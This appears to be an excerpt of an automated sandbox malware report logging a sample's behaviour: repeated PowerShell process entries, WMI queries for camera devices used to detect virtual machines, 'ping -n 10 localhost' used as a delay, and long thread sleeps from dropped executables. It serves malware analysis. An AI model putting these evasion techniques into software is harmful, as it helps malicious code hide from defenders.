Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\portintosvc\driverInto.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Memory allocated: 1AF40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Memory allocated: E30000 memory reserve \| memory write watch
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Memory allocated: 1A920000 memory reserve \| memory write watch

Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 596926	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 594834	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 599843
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 599705
